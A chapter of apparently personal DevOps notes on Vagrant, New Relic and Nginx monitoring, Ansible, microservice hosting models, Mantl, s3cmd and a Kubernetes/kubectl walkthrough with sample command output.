14.5.1 Quick Guide to Vagrant on Amazon EC2 https://github.com/mitchellh/vagrant-aws http://www.cantoni.org/2014/09/22/quick-guide-vagrant-amazon-ec2 http://www.devopsdiary.com/blog/2013/05/07/automated-deployment-of-aws-ec2-instances-with-vagrant-and-puppet/

14.5.2 How to use vagrant in a proxy environment?

$ vagrant plugin install vagrant-proxyconf
$ vim ~/.vagrant.d/Vagrantfile

Vagrant.configure("2") do |config|
  if Vagrant.has_plugin?("vagrant-proxyconf")
    config.proxy.http     = "http://192.168.1.234:8080/"
    config.proxy.https    = "http://192.168.1.234:8080/"
    config.proxy.no_proxy = "localhost,127.0.0.1,.example.com"
  end
  # ... other stuff
end

https://github.com/tmatilai/vagrant-proxyconf
http://stackoverflow.com/questions/19872591/how-to-use-vagrant-in-a-proxy-enviroment

14.5.3 Disable or remove the proxy

$ VAGRANT_HTTP_PROXY="" VAGRANT_HTTPS_PROXY="" vagrant up --no-provision
$ vagrant ssh
$ curl 'https://api.ipify.org?format=json'


14.5.4 Install ubuntu

$ vagrant init ubuntu/trusty64
$ vagrant init ubuntu/xenial64
$ vagrant up --provider virtualbox
$ vagrant ssh

14.5.5 Multi-Machine https://atlas.hashicorp.com/ubuntu https://www.vagrantup.com/docs/multi-machine/

14.5.6 CPU and Memory

https://www.vagrantup.com/docs/virtualbox/configuration.html

config.vm.provider "virtualbox" do |v|
  v.memory = 1024
  v.cpus   = 2
end

14.5.7 Update plugin

$ vagrant plugin update [<name>]

14.6 Monitoring Tools

14.6.1 New Relic

Configure newrelic with Gunicorn:

$ pip install newrelic
$ newrelic-admin generate-config newrelic.ini
$ NEW_RELIC_CONFIG_FILE=newrelic.ini newrelic-admin run-program gunicorn -b 0.0.0.0:8000 -w ${GUNICORN_WORKERS:-3} pomegranate.wsgi:application

Install New Relic server on Debian/ubuntu

$ echo deb http://apt.newrelic.com/debian/ newrelic non-free >> /etc/apt/sources.list.d/newrelic.list
$ wget -O- https://download.newrelic.com/548C16BF.gpg | apt-key add -
$ apt-get update
$ apt-get install newrelic-sysmond
$ nrsysmond-config --set license_key=
$ /etc/init.d/newrelic-sysmond start
# To uninstall
$ apt-get remove newrelic-sysmond

https://docs.newrelic.com/docs/servers/new-relic-servers-linux/installation-configuration/servers-installation-ubuntu-debian

Enabling New Relic Servers for Docker

$ groupadd -r docker
$ usermod -a -G docker newrelic

https://docs.newrelic.com/docs/servers/new-relic-servers-linux/installation-configuration/enabling-new-relic-servers-docker
https://docs.newrelic.com/docs/servers/new-relic-servers-linux/getting-started/new-relic-servers-docker

14.6.2 What is bam.nr-data.net

This is for RUM injections for our Browser monitoring product. http://newrelic.com/browser-monitoring https://discuss.newrelic.com/t/what-is-bam-nr-data-net/13848/2 https://docs.newrelic.com/docs/browser/new-relic-browser/page-load-timing-resources/page-load-timing-process https://docs.newrelic.com/docs/new-relic-browser/instrumentation-for-page-load-timing https://docs.newrelic.com/docs/browser/new-relic-browser/performance-quality/security-new-relic-browser

14.6.3 How to install Nginx New Relic plugin http://nginx.org/en/linux_packages.html http://newrelic.com/plugins/nginx-inc/13 http://haydenjames.io/using-new-relic-monitor-nginx-heres/ https://www.scalescale.com/tips/nginx/nginx-new-relic-plugin/

$ wget http://nginx.org/keys/nginx_signing.key
$ sudo apt-key add nginx_signing.key
$ sudo vim /etc/apt/sources.list

# Debian
deb http://nginx.org/packages/debian/ jessie nginx
deb-src http://nginx.org/packages/debian/ jessie nginx

# Ubuntu
deb http://nginx.org/packages/ubuntu/ trusty nginx
deb-src http://nginx.org/packages/ubuntu/ trusty nginx

$ sudo apt-get update
$ sudo apt-get install nginx-nr-agent

Output:

Thanks for using NGINX!

NGINX agent for New Relic is installed. Configuration file is: /etc/nginx-nr-agent/nginx-nr-agent.ini

Documentation and configuration examples are available here:


/usr/share/doc/nginx-nr-agent/README.txt

Please use "service nginx-nr-agent" to control the agent daemon.

More information about NGINX products is available on: * https://www.nginx.com/

$ sudo vim /etc/nginx-nr-agent/nginx-nr-agent.ini
# update LICENSE KEY and [source] section

$ sudo vim nginx.conf

# Server status
location = /status {
    stub_status on;
    allow 127.0.0.1;
    allow 172.17.0.0/16;
    deny all;
}

Testing the New Relic Nginx plugin

The best way to check whether this is working is to tail the logs:

$ tail -f /var/log/nginx-nr-agent.log

14.6.4 Real-time web log analyzer and interactive viewer

$ goaccess -f nginx.log

$ goaccess -f nginx.log --log-format="%h %^[%d:%^] \"%r\" %s %b \"%R\" \"%u\"" --date-format="%d/%b/%Y" --time-format="%T" -a > report.html

https://github.com/allinurl/goaccess

14.7 Ansible

Ansible's unique feature set:

• Based on an agent-less architecture (unlike Chef or Puppet).
• Accessed mostly through SSH (it also has local and paramiko modes).
• No custom security infrastructure is required.
• Configurations (playbooks, modules, etc.) are written in the easy-to-use YAML format.
• Shipped with more than 250 built-in modules.
• Full configuration management, orchestration, and deployment capability.
• Ansible interacts with its clients either through playbooks or a command-line tool.

http://cloudacademy.com/blog/ansible-aws/
http://docs.ansible.com/ansible/guide_aws.html
http://docs.ansible.com/ansible/ec2_module.html
https://aws.amazon.com/blogs/apn/getting-started-with-ansible-and-dynamic-amazon-ec2-inventory-management/
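As a minimal sketch (the inventory and host group below are hypothetical), a playbook that installs and starts nginx over SSH without any agent on the target; run it with ansible-playbook -i hosts site.yml:

# hosts (inventory)
# [web]
# 192.168.10.50

# site.yml
---
- hosts: web
  become: yes
  tasks:
    - name: Install nginx
      apt:
        name: nginx
        state: present
        update_cache: yes

    - name: Ensure nginx is running and enabled
      service:
        name: nginx
        state: started
        enabled: yes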


14.7.1 Install

$ sudo pip install ansible

$ sudo apt-add-repository -y ppa:ansible/ansible
$ sudo apt-get update
$ sudo apt-get install -y ansible

14.8 Microservices

14.8.1 Multiple Services Per Host

Benefits:

First, purely from a host management point of view, it is simpler. In a world where one team manages the infrastructure and another team manages the software, the infrastructure team's workload is often a function of the number of hosts it has to manage. If more services are packed on to a single host, the host management workload doesn't increase as the number of services increases.

Second is cost. Even if you have access to a virtualization platform that allows you to provision and resize virtual hosts, the virtualization can add an overhead that reduces the underlying resources available to your services. In my opinion, both these problems can be addressed with new working practices and technology, and we'll explore that shortly.

This model is also familiar to those who deploy into some form of an application container. In some ways, the use of an application container is a special case of the multiple-services-per-host model.

This model can also simplify the life of the developer. Deploying multiple services to a single host in production is synonymous with deploying multiple services to a local dev workstation or laptop. If we want to look at an alternative model, we want to find a way to keep this conceptually simple for developers.

Challenges:

First, it can make monitoring more difficult. For example, when tracking CPU, do I need to track the CPU of one service independent of the others? Or do I care about the CPU of the box as a whole?

Side effects can also be hard to avoid. If one service is under significant load, it can end up reducing the resources available to other parts of the system. Gilt, when scaling out the number of services it ran, hit this problem. Initially it colocated many services on a single box, but uneven load on one of the services would have an adverse impact on everything else running on that host. This makes impact analysis of host failures more complex as well: taking a single host out of commission can have a large ripple effect.

Deployment of services can be somewhat more complex too, as ensuring one deployment doesn't affect another leads to additional headaches. For example, if I use Puppet to prepare a host, but each service has different (and potentially contradictory) dependencies, how can I make that work? In the worst-case scenario, I have seen people tie multiple service deployments together, deploying multiple different services to a single host in one step, to try to simplify the deployment of multiple services to one host. In my opinion, the small upside in improving simplicity is more than outweighed by the fact that we have given up one of the key benefits of microservices: striving for independent release of our software. If you do adopt the multiple-services-per-host model, make sure you keep hold of the idea that each service should be deployed independently.


This model can also inhibit autonomy of teams. If services for different teams are installed on the same host, who gets to configure the host for their services? In all likelihood, this ends up getting handled by a centralized team, meaning it takes more coordination to get services deployed. Another issue is that this option can limit our deployment artifact options. Image-based deployments are out, as are immutable servers unless you tie multiple different services together in a single artifact, which we really want to avoid. The fact that we have multiple services on a single host means that efforts to target scaling to the service most in need of it can be complicated. Likewise, if one microservice handles data and operations that are especially sensitive, we might want to set up the underlying host differently, or perhaps even place the host itself in a separate network segment. Having everything on one host means we might end up having to treat all services the same way even if their needs are different.

14.8.2 Single Service Per Host

With a single-service-per-host model, we avoid the side effects of multiple services living on a single host, making monitoring and remediation much simpler. We have potentially reduced our single points of failure. An outage to one host should impact only a single service, although that isn't always clear when you're using a virtualized platform. We also can more easily scale one service independently from others, and deal with security concerns more easily by focusing our attention only on the service and host that requires it. Having an increased number of hosts has potential downsides, though. We have more servers to manage, and there might also be a cost implication of running more distinct hosts. Despite these problems, this is still the model I prefer for microservice architectures.

14.8.3 Mantl

From my understanding, Mantl is a collection of tools/applications that tie together to create a cohesive docker-based application platform. Mantl is ideally deployed on virtualized/cloud environments (AWS, OpenStack, GCE), but I have just recently been able to deploy it on bare-metal. The main component in Mantl is Mesos, which manages dockers, handles scheduling and task isolation. Marathon is a mesos framework that manages long running tasks, such as web services; this is where most applications reside. The combination of mesos-marathon handles application high-availability, resiliency and load-balancing. Tying everything together is consul, which handles service discovery. I use consul to do lookups for each application to communicate with each other. Mantl also includes the ELK stack for logging, but I haven't had any success in monitoring any of my applications, yet. There is also Chronos, where scheduled tasks are handled à la cron. Traefik acts as a reverse-proxy, where application/service endpoints are mapped to URLs for external services to communicate.

Basically, your microservices should be self-contained in docker images, initiate communications via consul lookup and log to standard I/O. Then you deploy your app, using the Marathon API, and monitor it in the Marathon UI. When deploying your dockerized app, marathon will register your docker image names in consul, along with their exposed ports. Scheduled tasks should be deployed in Chronos, where you will be able to monitor running tasks and pending scheduled tasks.

http://stackoverflow.com/questions/35267071/how-microservices-are-managed-using-mantl
http://www.infoq.com/news/2016/02/cisco-mantl-microservices
https://sreeninet.wordpress.com/2016/03/25/microservices-infrastructure-using-mantl/
https://fak3r.com/2015/05/27/howto-build-microservices-infrastructure-with-mantl/

$ git clone https://github.com/CiscoCloud/mantl.git
$ cd mantl
$ pip install -r requirements.txt
$ ./security-setup
$ vagrant up
$ vagrant status


Now browse to https://192.168.100.101

To create a new container:

$ curl -k -X POST -H "Content-Type: application/json" -u "admin:1" -d@"examples/hello-world/hello-world.json" "https://192.168.100.101/marathon/v2/apps"

Mantl uses Mesos as the Orchestration layer.

14.8.4 lattice http://lattice.cf/docs/getting-started/

14.8.5 vamp http://vamp.io/

14.8.6 calico https://www.projectcalico.org/getting-started/docker/ https://github.com/projectcalico/calico

14.8.7 marathon https://github.com/mesosphere/marathon

14.8.8 terraform https://www.terraform.io/intro/

14.9 Simple Storage Service (S3)

14.9.1 S3cmd configuration to use with Swift storage object

$ vim ~/.s3cfg

bucket_location =
host_base = 102fb212.example-storage.com
host_bucket = 102fb212.example-storage.com
access_key = 1111111111
secret_key = 2222222222
signature_v2 = True
cloudfront_host =
simpledb_host =
website_endpoint =
website_error =
website_index =

https://docs.minio.io/docs/s3cmd-with-minio


14.9.2 Sync remote s3 objects to the local file system

$ s3cmd sync s3://files/ ~/ws/backup/files/

14.10 VPS services

14.10.1 VPS with more Storage https://www.bitaccel.com/#storage https://backupsy.com/ https://buyvm.net/storage-vps/

14.10.2 Cheap VPS https://vpsdime.com https://openvz.io/

14.11 kubernetes

Kubernetes is a container orchestration tool that builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

Although Kubernetes is a feature-rich project, a few key features caught our attention: namespaces (http://kubernetes.io/docs/user-guide/namespaces/), automated rollouts and rollbacks (http://kubernetes.io/docs/user-guide/deployments/), service discovery via DNS (http://kubernetes.io/docs/user-guide/services/), automated container scaling based on resource usage (http://kubernetes.io/docs/user-guide/horizontal-pod-autoscaling/), and of course, the promise of a self-healing system (http://kubernetes.io/docs/user-guide/pod-states/#container-probes).

http://danielfm.me/posts/five-months-of-kubernetes.html



14.11.1 Monitoring https://kubernetes.io/docs/concepts/cluster-administration/resource-usage-monitoring/ https://github.com/kubernetes/heapster https://github.com/google/cadvisor

14.11.2 Running Kubernetes Locally via Minikube https://github.com/kubernetes/minikube/releases

Installation

$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/v0.18.0/minikube-linux-amd64 && chmod +x minikube && sudo mv minikube /usr/local/bin/

$ minikube get-k8s-versions
$ minikube start
$ minikube start --docker-env HTTP_PROXY="http://127.0.0.1:7070" --docker-env HTTPS_PROXY="http://127.0.0.1:7070"


$ minikube docker-env
$ eval $(minikube docker-env)
$ docker ps
$ minikube addons list
$ minikube dashboard
$ kubectl run hello-minikube --image=gcr.io/google_containers/echoserver:1.4 --port=8080
$ minikube ssh cat /var/lib/boot2docker/profile
$ minikube stop
$ minikube delete

https://kubernetes.io/docs/getting-started-guides/minikube/#installation
https://github.com/petervandenabeele/hello-kubernetes

Minikube behind a proxy

$ minikube start --docker-env="http_proxy=http://192.168.10.119:7070" --docker-env="https_proxy=http://192.168.10.119:7070"

$ kubectl cluster-info
# Listing the nodes in the cluster
$ kubectl get nodes
# List cluster events
$ kubectl get events
# List services that are running in the cluster
$ kubectl get services
$ kubectl get pods
$ kubectl get pods --namespace=kube-system

To start with, we will only see one service, named kubernetes. This service is the core API server, monitoring and logging services for the pods and cluster. Even though we have not deployed any applications on Kubernetes yet, we note that there are several containers already running. The following is a brief description of each container:

• fluentd-gcp (fluentd-elasticsearch by Elasticsearch and Kibana): This container collects and sends the cluster log files to the Google Cloud Logging service.
• kube-ui: This is the UI that we saw earlier.
• kube-controller-manager: The controller manager controls a variety of cluster functions. Ensuring accurate and up-to-date replication is one of its vital roles. Additionally, it monitors, manages, and discovers new nodes. Finally, it manages and updates service endpoints.
• kube-apiserver: This container runs the API server. As we explored in the Swagger interface, this RESTful API allows us to create, query, update, and remove various components of our Kubernetes cluster.
• kube-scheduler: The scheduler takes unscheduled pods and binds them to nodes.
• etcd: This runs the etcd software built by CoreOS. etcd is a distributed and consistent key-value store. This is where the Kubernetes cluster state is stored, updated, and retrieved by various components of K8s.
• pause: The pause container is often referred to as the pod infrastructure container and is used to set up and hold the networking namespace and resource limits for each pod.
• kube-dns: provides the DNS and service discovery plumbing.
• monitoring-heapster: This is the system used to monitor resource usage across the cluster.


• monitoring-influx-grafana: provides the database and dashboard we saw earlier for monitoring the infrastructure.
• skydns: This uses DNS to provide a distributed service discovery utility that works with etcd.
• kube2sky: This is the connector between skydns and kubernetes. Services in the API are monitored for changes and updated in skydns appropriately.
• heapster: This does resource usage and monitoring.
• exechealthz: This performs health checks on the pods.

The environment variable

KUBERNETES_PROVIDER

$ kube-down
$ kube-up

Basic concepts: scheduling, service discovery, health checking, pods, services, replication controllers, labels, and nodes (formerly minions; note that in v1.0, minion was renamed to node). The pods include services for DNS, logging, and pod health checks.

Pods

Pods essentially allow you to logically group containers and pieces of our application stacks together. While pods may run one or more containers inside, the pod itself may be one of many that is running on a Kubernetes (minion) node. As we'll see, pods give us a logical group of containers that we can then replicate, schedule, and balance service endpoints across.

nodejs-pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: node-js-pod
spec:
  containers:
    - name: node-js-pod
      image: bitnami/apache:latest
      ports:
        - containerPort: 80

$ kubectl create -f nodejs-pod.yaml
$ kubectl describe pods/node-js-pod

$ kubectl exec node-js-pod -- curl <pod-ip>

By default, this runs a command in the first container it finds, but you can select a specific one using the -c argument.

Labels

Labels are just simple key-value pairs. You will see them on pods, replication controllers, services, and so on. The label acts as a selector and tells Kubernetes which resources to work with for a variety of operations. Think of it as a filtering option.
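For example (the label values here are hypothetical), a label can be attached after creation and then used as a selector to filter resources:

# attach a label to the pod created above
$ kubectl label pod node-js-pod deployment=demo
# select resources by label
$ kubectl get pods -l deployment=demo
$ kubectl get pods --selector name=node-js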


Services

Services and replication controllers give us the ability to keep our applications running with little interruption and graceful recovery. Services allow us to abstract access away from the consumers of our applications. Using a reliable endpoint, users and other programs can access pods running on your cluster seamlessly. K8s achieves this by making sure that every node in the cluster runs a proxy named kube-proxy. As the name suggests, kube-proxy's job is to proxy communication from a service endpoint back to the corresponding pod that is running the actual application.

Replication controllers (RCs)

As the name suggests, replication controllers manage the number of nodes that a pod and included container images run on. They ensure that an instance of an image is being run with the specific number of copies. RCs create a high-level mechanism to make sure that things are operating correctly across the entire application and cluster. RCs are simply charged with ensuring that you have the desired scale for your application. You define the number of pod replicas you want running and give it a template for how to create new pods. Just like services, we will use selectors and labels to define a pod's membership in a replication controller.

Kubernetes doesn't require the strict behavior of the replication controller. In fact, version 1.1 has a job controller in beta that can be used for short-lived workloads, which allows jobs to be run to a completion state.

nodejs-controller.yaml:

apiVersion: v1
kind: ReplicationController
metadata:
  name: node-js
  labels:
    name: node-js
    deployment: demo
spec:
  replicas: 3
  selector:
    name: node-js
    deployment: demo
  template:
    metadata:
      labels:
        name: node-js
    spec:
      containers:
        - name: node-js
          image: jonbaier/node-express-info:latest
          ports:
            - containerPort: 80

• Kind tells K8s what type of resource we are creating. In this case, the type is ReplicationController. The kubectl script uses a single create command for all types of resources. The benefit here is that you can easily create a number of resources of various types without needing to specify individual parameters for each type. However, it requires that the definition files can identify what it is they are specifying.
• ApiVersion simply tells Kubernetes which version of the schema we are using. All examples in this book will be on v1.


• Metadata is where we will give the resource a name and also specify labels that will be used to search and select resources for a given operation. The metadata element also allows you to create annotations, which are for nonidentifying information that might be useful for client tools and libraries.
• Spec will vary based on the kind or type of resource we are creating. In this case, it's ReplicationController, which ensures the desired number of pods are running. The replicas element defines the desired number of pods, the selector tells the controller which pods to watch, and finally, the template element defines a template to launch a new pod. The template section contains the same pieces we saw in our pod definition earlier. An important thing to note is that the selector values need to match the labels values specified in the pod template. Remember that this matching is used to select the pods being managed.

$ kubectl create -f nodejs-controller.yaml
$ kubectl create -f nodejs-rc-service.yaml

A Kubernetes cluster is formed out of 2 types of resources:

• Master: coordinates the cluster
• Nodes: where we run applications

https://kubernetesbootcamp.github.io/kubernetes-bootcamp/index.html

# docker run --net=host -d gcr.io/google_containers/etcd:2.0.9 /usr/local/bin/etcd --addr=127.0.0.1:4001 --bind-addr=0.0.0.0:4001 --data-dir=/var/etcd/data
# docker run --net=host -d -v /var/run/docker.sock:/var/run/docker.sock gcr.io/google_containers/hyperkube:v0.21.2 /hyperkube kubelet --api_servers=http://localhost:8080 --v=2 --address=0.0.0.0 --enable_server --hostname_override=127.0.0.1 --config=/etc/kubernetes/manifests
# docker run -d --net=host --privileged gcr.io/google_containers/hyperkube:v0.21.2 /hyperkube proxy --master=http://127.0.0.1:8080 --v=2

Install manually

$ git clone --depth 1 https://github.com/kubernetes/kubernetes.git
$ export KUBERNETES_PROVIDER=vagrant
$ export KUBE_VERSION=1.2.0
$ export FLANNEL_VERSION=0.5.0
$ export ETCD_VERSION=2.2.0
$ export K8S_VERSION=$(curl -sS https://storage.googleapis.com/kubernetes-release/release/stable.txt)
$ export K8S_VERSION=$(curl -sS https://storage.googleapis.com/kubernetes-release/release/latest.txt)

14.11.3 Guestbook Example https://github.com/kubernetes/kubernetes/tree/master/examples/guestbook

14.11.4 Service Discovery

There are two ways Kubernetes can implement service discovery: through environment variables and through DNS.
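A rough sketch of what both mechanisms look like from inside a pod, assuming a Service named node-js in the default namespace (the names and IP shown are illustrative, not output from these notes):

# Environment variables injected into pods started after the Service exists
# (Kubernetes uses the <SERVICE_NAME>_SERVICE_HOST / _PORT naming convention):
$ kubectl exec $POD_NAME -- env | grep NODE_JS
NODE_JS_SERVICE_HOST=10.0.0.25      # illustrative value
NODE_JS_SERVICE_PORT=80

# DNS-based discovery via the cluster DNS add-on:
$ kubectl exec $POD_NAME -- curl http://node-js.default.svc.cluster.local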

14.11.5 Install kubectl binary via curl


$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

# To download a specific version
$ curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.13.1/bin/linux/amd64/kubectl

$ chmod +x ./kubectl
$ sudo mv ./kubectl /usr/local/bin/kubectl

https://kubernetes.io/docs/tasks/kubectl/install/

14.11.6 Interactive K8S starting guide

$ kubectl cluster-info
# Shows all nodes that can be used to host our applications
$ kubectl get nodes
# Show both the client and the server versions
$ kubectl version
# Deploy our app
$ kubectl run kubernetes-bootcamp --image=docker.io/jocatalin/kubernetes-bootcamp:v1 --port=80
deployment "kubernetes-bootcamp" created
# List our deployments
$ kubectl get deployments
NAME                  DESIRED   CURRENT   UP-TO-DATE   AVAILABLE   AGE
kubernetes-bootcamp   1         1         1            1           4m
$ kubectl proxy
Starting to serve on 127.0.0.1:8001
$ export POD_NAME=$(kubectl get pods -o go-template --template '{{range .items}}{{.metadata.name}}{{"\n"}}{{end}}')
$ echo Name of the Pod: $POD_NAME
$ kubectl get pods
NAME                                  READY     STATUS    RESTARTS   AGE
kubernetes-bootcamp-390780338-rpcw8   1/1       Running   0          12m

https://kubernetes.io/docs/tutorials/
https://kubernetes.io/docs/tutorials/kubernetes-basics/
https://kubernetes.io/docs/tutorials/kubernetes-basics/explore-intro/

Pods are the atomic unit on the Kubernetes platform. When we create a Deployment on Kubernetes, that Deployment creates Pods with containers inside them (as opposed to creating containers directly). Each Pod is tied to the Node where it is scheduled, and remains there until termination (according to restart policy) or deletion. In case of a Node failure, identical Pods are scheduled on other available Nodes in the cluster.

A Pod always runs on a Node. A Node is a worker machine in Kubernetes and may be either a virtual or a physical machine, depending on the cluster. Each Node is managed by the Master. A Node can have multiple pods, and the Kubernetes master automatically handles scheduling the pods across the Nodes in the cluster. The Master’s automatic scheduling takes into account the available resources on each Node


# To view what containers are inside that Pod and what images are used to build those containers
$ kubectl describe pods
# Anything that the application would normally send to STDOUT becomes logs for the container within the Pod.
$ kubectl logs $POD_NAME
# We can execute commands directly on the container once the Pod is up and running.
$ kubectl exec $POD_NAME
# Start a bash session in the Pod's container
$ kubectl exec -ti $POD_NAME bash


A Service routes traffic across a set of Pods. Services are the abstraction that allow pods to die and replicate in Kubernetes without impacting your application. Discovery and routing among dependent Pods (such as the frontend and backend components in an application) is handled by Kubernetes Services.

Services match a set of Pods using labels and selectors, a grouping primitive that allows logical operation on objects in Kubernetes. Labels are key/value pairs attached to objects and can be used in any number of ways:

• Designate objects for development, test, and production
• Embed version tags
• Classify an object using tags
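A minimal Service manifest sketch (names are hypothetical) showing how the selector on the Service matches the label on the Pods; the kubectl expose command used below generates essentially the same object:

apiVersion: v1
kind: Service
metadata:
  name: kubernetes-bootcamp
spec:
  type: NodePort
  selector:
    run: kubernetes-bootcamp    # must match the label on the Pods
  ports:
    - port: 8080
      targetPort: 8080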

# List the current Services from our cluster
$ kubectl get services
$ kubectl expose deployment/kubernetes-bootcamp --type="NodePort" --port 8080
$ kubectl get services
$ kubectl describe services/kubernetes-bootcamp

14.11.7 Tutorials https://www.digitalocean.com/community/tutorials/modernizing-applications-for-kubernetes

14.11.8 Working with kubectl

$ kubectl version
"
Client Version: version.Info{Major:"1", Minor:"13", GitVersion:"v1.13.1", GitCommit:"eec55b9ba98609a46fee712359c7b5b365bdd920", GitTreeState:"clean", BuildDate:"2018-12-13T10:39:04Z", GoVersion:"go1.11.2", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"11", GitVersion:"v1.11.6", GitCommit:"b1d75deca493a24a2f87eb1efde1a569e52fc8d9", GitTreeState:"clean", BuildDate:"2018-12-16T04:30:10Z", GoVersion:"go1.10.3", Compiler:"gc", Platform:"linux/amd64"}
"



$ kubectl cluster-info
"
Kubernetes master is running at https://192.168.0.190/k8s/clusters/c-bmbj9
KubeDNS is running at https://192.168.0.190/k8s/clusters/c-bmbj9/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy

To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'.
"

$ kubectl config view
"
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: DATA+OMITTED
    server: https://192.168.0.190/k8s/clusters/c-bmbj9
  name: sample-cluster
contexts:
- context:
    cluster: sample-cluster
    user: user-c8kmt
  name: sample-cluster
current-context: sample-cluster
kind: Config
preferences: {}
users:
- name: user-c8kmt
  user:
    token: kubeconfig-user-c8kmt:7nlsm6vxwrtp9bl79whg42sp7k5vrtc86qskqg9ksvm6xb5dbc558n
"

$ kubectl get nodes
"
NAME         STATUS    ROLES               AGE       VERSION
ubuntu-190   Ready     controlplane,etcd   27m       v1.11.6
ubuntu-191   Ready     worker              12m       v1.11.6
"

$ kubectl top node
"
NAME         CPU(cores)   CPU%      MEMORY(bytes)   MEMORY%
ubuntu-190   107m         5%        1943Mi          50%
ubuntu-191   40m          2%        786Mi           20%
"

$ kubectl get events
"
LAST SEEN   FIRST SEEN   COUNT   NAME   KIND   SUBOBJECT   TYPE   REASON   SOURCE   MESSAGE
...
"

$ kubectl get namespaces
"
NAME            STATUS    AGE
cattle-system   Active    5d
default         Active    5d
ingress-nginx   Active    5d
kube-public     Active    5d
kube-system     Active    5d
"

$ kubectl create namespace sample-ns
"
namespace/sample-ns created
"

$ kubectl config get-contexts
"
CURRENT   NAME             CLUSTER          AUTHINFO     NAMESPACE
*         sample-cluster   sample-cluster   user-c8kmt
"

$ kubectl config current-context
"
sample-cluster
"

$ kubectl config set-context sample-cluster --namespace=sample-ns
"
Context "sample-cluster" modified.
"

$ kubectl config get-contexts
"
CURRENT   NAME             CLUSTER          AUTHINFO     NAMESPACE
*         sample-cluster   sample-cluster   user-c8kmt   sample-ns
"

$ kubectl run example-app --image=nginx:latest --port=80
"
kubectl run --generator=deployment/apps.v1 is DEPRECATED and will be removed in a future version. Use kubectl run --generator=run-pod/v1 or kubectl create instead.
deployment.apps/example-app created
"

$ kubectl expose deployment example-app --type=NodePort
"
service/example-app exposed
"

$ kubectl run sample-app --image=nginx:latest
"
kubectl run --generator=deployment/apps.v1 is DEPRECATED and will be removed in a future version. Use kubectl run --generator=run-pod/v1 or kubectl create instead.
deployment.apps/example-app created
"

$ kubectl expose deployment sample-app --type=NodePort --port=80 --name=sample-service
"
service/sample-service exposed
"

$ kubectl get services --all-namespaces
"
NAMESPACE       NAME                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)         AGE
default         kubernetes             ClusterIP   10.43.0.1       <none>        443/TCP         1h
ingress-nginx   default-http-backend   ClusterIP   10.43.233.93    <none>        80/TCP          5d
kube-system     kube-dns               ClusterIP   10.43.0.10      <none>        53/UDP,53/TCP   5d
kube-system     metrics-server         ClusterIP   10.43.126.84    <none>        443/TCP         5d
sample-ns       example-app            NodePort    10.43.146.159   <none>        80:31525/TCP    16m
sample-ns       sample-service         NodePort    10.43.144.129   <none>        80:30033/TCP    5m
"

$ kubectl describe services
"
Name:                      example-app
Namespace:                 default
Labels:                    run=example-app
Annotations:               field.cattle.io/publicEndpoints: [{"addresses":["192.168.0.191"],"port":32093,"protocol":"TCP","serviceName":"default:example-app","allNodes":true}]
Selector:                  run=example-app
Type:                      NodePort
IP:                        10.43.6.186
Port:                      80/TCP
TargetPort:                80/TCP
NodePort:                  32093/TCP
Endpoints:                 10.42.1.41:80
Session Affinity:          None
External Traffic Policy:   Cluster
Events:

Name:                      sample-service
Namespace:                 default
Labels:                    run=sample-app
Annotations:               field.cattle.io/publicEndpoints: [{"addresses":["192.168.0.191"],"port":32134,"protocol":"TCP","serviceName":"default:sample-service","allNodes":true}]
Selector:                  run=sample-app
Type:                      NodePort
IP:                        10.43.167.187
Port:                      80/TCP
TargetPort:                80/TCP
NodePort:                  32134/TCP
Endpoints:                 10.42.1.42:80
Session Affinity:          None
External Traffic Policy:   Cluster
Events:
"

$ kubectl get pods
"
NAME                          READY     STATUS    RESTARTS   AGE
example-app-75967bd4d-b4v7g   1/1       Running   0          16m
sample-app-7d77dc8bbc-xhrjh   1/1       Running   0          6m
"

$ kubectl get pods --show-labels
"
NAME                          READY     STATUS    RESTARTS   AGE       LABELS
example-app-75967bd4d-ph256   1/1       Running   0          8m        pod-template-hash=315236808,run=sample-app
sample-app-7d77dc8bbc-2h77g   1/1       Running   0          20m       pod-template-hash=3833874667,run=sample-app
"

$ kubectl get pods --namespace=kube-system
"
NAME                                      READY     STATUS      RESTARTS   AGE
canal-f9zgh                               3/3       Running     0          45m
canal-q2955                               3/3       Running     0          31m
kube-dns-7588d5b5f5-drhqd                 3/3       Running     0          45m
kube-dns-autoscaler-5db9bbb766-5jn5b      1/1       Running     0          45m
metrics-server-97bc649d5-qbkdf            1/1       Running     0          45m
rke-ingress-controller-deploy-job-pf6ks   0/1       Completed   0          45m
rke-kubedns-addon-deploy-job-lgmxs        0/1       Completed   0          45m
rke-metrics-addon-deploy-job-5swcc        0/1       Completed   0          45m
rke-network-plugin-deploy-job-sbzbs       0/1       Completed   0          45m
"

$ kubectl get pods --all-namespaces
"
NAMESPACE       NAME                                      READY     STATUS      RESTARTS   AGE
cattle-system   cattle-cluster-agent-57458fc9b9-lvzsx     1/1       Running     1          5d
cattle-system   cattle-node-agent-8tqv2                   1/1       Running     0          5d
cattle-system   cattle-node-agent-fd2wh                   1/1       Running     0          5d
ingress-nginx   default-http-backend-797c5bc547-q2w62     1/1       Running     0          5d
ingress-nginx   nginx-ingress-controller-7szwb            1/1       Running     0          5d
kube-system     canal-f9zgh                               3/3       Running     0          5d
kube-system     canal-q2955                               3/3       Running     0          5d
kube-system     kube-dns-7588d5b5f5-drhqd                 3/3       Running     0          5d
kube-system     kube-dns-autoscaler-5db9bbb766-5jn5b      1/1       Running     0          5d
kube-system     metrics-server-97bc649d5-qbkdf            1/1       Running     0          5d
kube-system     rke-ingress-controller-deploy-job-pf6ks   0/1       Completed   0          5d
kube-system     rke-kubedns-addon-deploy-job-lgmxs        0/1       Completed   0          5d
kube-system     rke-metrics-addon-deploy-job-5swcc        0/1       Completed   0          5d
kube-system     rke-network-plugin-deploy-job-sbzbs       0/1       Completed   0          5d
sample-ns       example-app-75967bd4d-clmfb               1/1       Running     0          42m
sample-ns       sample-app-7d77dc8bbc-wkdxt               1/1       Running     0          30m
"

$ kubectl get deployments
"
NAME          DESIRED   CURRENT   UP-TO-DATE   AVAILABLE   AGE
